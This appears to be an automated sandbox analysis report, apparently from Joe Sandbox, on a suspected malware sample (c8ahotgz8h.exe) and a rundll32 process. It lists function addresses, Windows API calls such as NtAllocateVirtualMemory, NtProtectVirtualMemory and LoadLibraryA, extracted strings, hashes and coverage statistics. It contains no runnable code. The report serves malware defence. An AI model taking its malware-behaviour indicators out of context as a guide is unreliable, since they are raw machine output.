Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00000000,?), ref: 004188DD

Strings

65A, xrefs: 004188D2, 004188DC

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00411760, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,00403AC6,00000000), ref: 00411777

Strings

@J7<, xrefs: 0041178B

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
Instruction ID: f3e6d472f992f1f590b6b70f0584e266d92e33c6be755c55e2db4f12b6075795
Opcode Fuzzy Hash: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
Instruction Fuzzy Hash: 24311EB5A0020AAFDB00DFD8D8809EFB7B9BF88304B108559E515AB214D775EE45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041175E, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,00403AC6,00000000), ref: 00411777

Strings

@J7<, xrefs: 0041178B

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: b6a0e72435744ef3055ad4891f0d00ddc2d3dfed23193298c0d6e5199d10fa52
Instruction ID: 5749db0eb7fcbb07965c2f41df2ef49ff0e8166f3e4ea925c17c58d6b4ca49a4
Opcode Fuzzy Hash: b6a0e72435744ef3055ad4891f0d00ddc2d3dfed23193298c0d6e5199d10fa52
Instruction Fuzzy Hash: 14311EB6A0020A9FDB00DFD8D8809EFB7BAFF88304B108559E515AB214D775AE45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004072DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004072FB

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f60e6dafd3e4c00e414ad486381866e2c845adc504c79fb64907f785a6f5e4a7
Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
Opcode Fuzzy Hash: f60e6dafd3e4c00e414ad486381866e2c845adc504c79fb64907f785a6f5e4a7
Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA

Uniqueness

Uniqueness Score: -1.00%

Function 004189F5, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004189B4

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 558c73087d880e6b38b06aeba6b12e23934193b87adee1dac964df1075fddadc
Instruction ID: 7fb613767383ea78da229ef5f7838ece650e27511afb5653b3193ac43ac23667
Opcode Fuzzy Hash: 558c73087d880e6b38b06aeba6b12e23934193b87adee1dac964df1075fddadc
Instruction Fuzzy Hash: 5911F3B2200209AFCB14DF89DC91EEB73ADEF8C754F108659FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00418960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004189B4

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 1af0cfd0e6c2e5daaf689e3a1adcdb327afdc4aaeaa6b63ab644a3d9e900bb8f
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 1401AFB2214108BBCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B34, Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
Instruction ID: ef1be6ec95822bbbb8ab02b4b335b7cd8bb34784a89431e09f03391bbe651767
Opcode Fuzzy Hash: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
Instruction Fuzzy Hash: D1F0C875E0010DABCF10DAD4E842FDDB378AB14318F0081A6ED1CAB281F574AB458B91

Uniqueness

Uniqueness Score: -1.00%

Function 00417430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040CCF0,?,?), ref: 0041746C

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
Instruction ID: 4bfac2df6ef5ebeeccdb4a327c9500ed522813dad8df6d918b149b18c006a7b7
Opcode Fuzzy Hash: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
Instruction Fuzzy Hash: 29E092733803043AE33065AD9C03FE7B79CCB81B65F55002AFA4DEB2C1D599F84142A8

Uniqueness

Uniqueness Score: -1.00%

Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFC2,0040CFC2,?,00000000,?,?), ref: 00418A80

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D42F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,?,00407C83,?), ref: 0040D45B

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
Instruction ID: d547e908a51b87359fd4076440c656bd412a0d374559f6f18339af9eb79bce8b
Opcode Fuzzy Hash: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
Instruction Fuzzy Hash: 5CD05E75B403043AEB10FEB49C03FAA2B845F56744F094078F949E73C3D964D5018624

Uniqueness

Uniqueness Score: -1.00%

Function 0040D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,?,00407C83,?), ref: 0040D45B

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 1fe6c35ecaf7b81e60c5cd7bd5a726fda9ef5b7f02edb88ad12302bbb7323291
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: CDD05E75B503042AE610BAA49C03F6632885B45B44F494064FA48A63C3D964E5008165

Uniqueness

Uniqueness Score: -1.00%

Function 043A2B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2B44

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9b1c3d5baa712d8576f3920a6a22195b22df55cc8e5ca1eb5e32cddccdf3c1f
Instruction ID: b72a614ce558e1e21571da05c695898a9404671f86b873140fc0323051e74c04
Opcode Fuzzy Hash: f9b1c3d5baa712d8576f3920a6a22195b22df55cc8e5ca1eb5e32cddccdf3c1f
Instruction Fuzzy Hash: 35B02B318024C0C7FB00EB200708B073900A7C0300F11D051D28202C0E4338D090F171

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04397550, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 043D44AB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043D4507
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 043D454D
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 043D4530
Execute=1, xrefs: 043D451E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 043D4460
CLIENT(ntdll): Processing section info %ws..., xrefs: 043D4592

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: a941e7a8bfd8d5e10f1735eef23f03871194bc7f76a53457a35cc47efa4bc773
Instruction ID: 164998e2cfb009cbd5fa558264694ca038481ccf03e989f0048a7945b839bb04
Opcode Fuzzy Hash: a941e7a8bfd8d5e10f1735eef23f03871194bc7f76a53457a35cc47efa4bc773
Instruction Fuzzy Hash: EF51F631A50219BAFF50AEA4EC89FEA73E8EF48304F0424A9E505A71C1E770BE45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04369046, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 043690B1
@, xrefs: 04369095

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 9a9ec9e6252d025120d4d81df5a3135943f264b922d29d5b8ed633d85d4319fa
Instruction ID: ac4504ebc2e0250beeae3a86c47e8e53ed15a87907a81138e08cd08120d5397d
Opcode Fuzzy Hash: 9a9ec9e6252d025120d4d81df5a3135943f264b922d29d5b8ed633d85d4319fa
Instruction Fuzzy Hash: 36814DB1D002699BDB31DF54CC44BDEB6B8AF04714F1051DAE91AB7240E730AE84CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: c8ahotgz8h.exe PID: 5500 Parent PID: 4644 c8ahotgz8h.exeCOMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	368
Total number of Limit Nodes:	6

Executed Functions

Function 022A0754, Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1433COMMON

Download Yara Rule

Strings

H+m, xrefs: 0229A66D
yW^g, xrefs: 022A0D53
Sm!|, xrefs: 022A0800
yW^g, xrefs: 022A0D58
}#c, xrefs: 0229A819
U=b, xrefs: 0229B67C

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
API String ID: 1029625771-3546614695
Opcode ID: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
Instruction ID: a5e7999bc3269b2950af3bffea668d7d1bfbea3289595030864100dc64e4db23
Opcode Fuzzy Hash: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
Instruction Fuzzy Hash: 04B2557161434ADFDF349E78CDA53EA37A2EF55390F95412ECC8A8B648D3358986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 022A06A2, Relevance: 13.5, APIs: 2, Strings: 5, Instructions: 1270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H+m, xrefs: 0229A66D
EK], xrefs: 02291450
";Jm, xrefs: 0229BD2A
}#c, xrefs: 0229A819
U=b, xrefs: 0229B67C

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: ";Jm$H+m$U=b$}#c$EK]
API String ID: 0-2571250244
Opcode ID: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
Instruction ID: d0f6face05315e375920b6352cfc450eb35e99dbcea15917051ecd2ba327a6ae
Opcode Fuzzy Hash: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
Instruction Fuzzy Hash: CEA2647161434A9FDF349E788DA53DE7BA2FF55350F55822ECC8A8B648D3348986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0229CE0C, Relevance: 12.0, APIs: 2, Strings: 4, Instructions: 1452COMMON

Download Yara Rule

Strings

H+m, xrefs: 0229A66D
EK], xrefs: 02291450
}#c, xrefs: 0229A819
U=b, xrefs: 0229B67C

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$U=b$}#c$EK]
API String ID: 1029625771-1197094480
Opcode ID: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
Instruction ID: d1ec68e43a0ce40026b042203d79788ef3b04a492b6a0fcad3c61eb422999de0
Opcode Fuzzy Hash: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
Instruction Fuzzy Hash: 73C2687161434A9FDF349E78CDA57EE37A2EF55390F95412ECC8A8B648D3348986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 022A322B, Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 994
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H+m, xrefs: 0229A66D
}#c, xrefs: 0229A819
U=b, xrefs: 0229B67C

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: H+m$U=b$}#c
API String ID: 0-2772983987
Opcode ID: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
Instruction ID: 106f6bca14348da9a695ba0758586648d3b52b6ca7768ea5abd02df1b0e4bee4
Opcode Fuzzy Hash: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
Instruction Fuzzy Hash: FD82437161434ADFDF349E78CDA53EE3BA2EF55390F958229CC8A8B258D3748585CB02

Uniqueness

Uniqueness Score: -1.00%

Function 022A2AD2, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 02291450
);J, xrefs: 022A2D08

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: );J$EK]
API String ID: 0-1158390361
Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction ID: 8aef15a0f8dccc1228480d4f0edce6af3f790094f83c71f7a487d3ca2a9f4d95
Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction Fuzzy Hash: CFB15930A14349CFDF38DEB4C9B43EA37A2EF55350F59416ACC8A8BA59D7319982CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0229C88B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0229CBC8
LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Strings

U=b, xrefs: 0229B67C

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: U=b
API String ID: 2616484454-117013522
Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction ID: 227d880e3932897dbe3dc2e449eaca24259683177a30928425fb41250dadf468
Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction Fuzzy Hash: BC816D71A1035BDFCF349EA89DA43EA36B3EF99390F94013ADC499B258D7358A41CB11

Uniqueness

Uniqueness Score: -1.00%

Function 022A1161, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 02291450

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: EK]
API String ID: 0-1532622298
Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction ID: eb2cbd250763272bcd8cf8e7208af8028c3c0dfd6f943d0961196a5626680773
Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction Fuzzy Hash: 8861BB7161034A9FDF359EB48AA43DB37A6EF9A3A0F55441ECC4ACFA01D7718986CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0229FFED, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`, xrefs: 022A01E0

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction ID: ab16a663e764d3b5b77d7488a763370fffa0ceef89f64fd4858d85e8ca8b30dd
Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction Fuzzy Hash: 0C519F7661075ACFCF745EA94E683DA33A3EFA13A0FDA402ACC4E9B504C7754A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 022A23E2, Relevance: 1.5, APIs: 1, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,022A15C1,12BC0BD0,0229A728), ref: 022A24F5

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction ID: bb1b8697066ceadb776b78f72aee6ae3e4ba5e73982924afa458c612b805582e
Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction Fuzzy Hash: 47017CB46143998FDF30CE68C8D87DA7695FB8D700F81412AAD4DAB305C6715E8ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0229BF1C, Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction ID: 37d5f78019999084bcb4418b3882eed55cbc9909077be02d458d021af0fcdcc1
Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction Fuzzy Hash: DA419A312243469FCF309EA849E03DB2262AF963B0F91431BCC69DB299D7718805C641

Uniqueness

Uniqueness Score: -1.00%

Function 0229BE04, Relevance: 1.6, APIs: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction ID: 292291f4bb927259cb8b5658176dd009d981b48308af0990d109cd4c712adefc
Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction Fuzzy Hash: 3A31BD75620359DBCF309FB459A43EA336AAF857A0F92011FDC46DB644D7718D80CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0229C02C, Relevance: 1.6, APIs: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction ID: 9bd5ac7265987f9528bbeea21211f54dbab524748460cf85ec56f83096b7df04
Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction Fuzzy Hash: A8318A726103199BCF30AE694E943DE27B7AFD9790FAA801BDC09DB204D77189468A51

Uniqueness

Uniqueness Score: -1.00%

Function 0229F3EE, Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

